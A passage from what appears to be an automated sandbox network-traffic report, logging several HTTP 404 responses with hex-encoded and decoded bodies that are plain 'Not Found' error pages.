31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:10:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:10:48 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:11:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:11:13 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:11:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:11:42 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:11:45 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 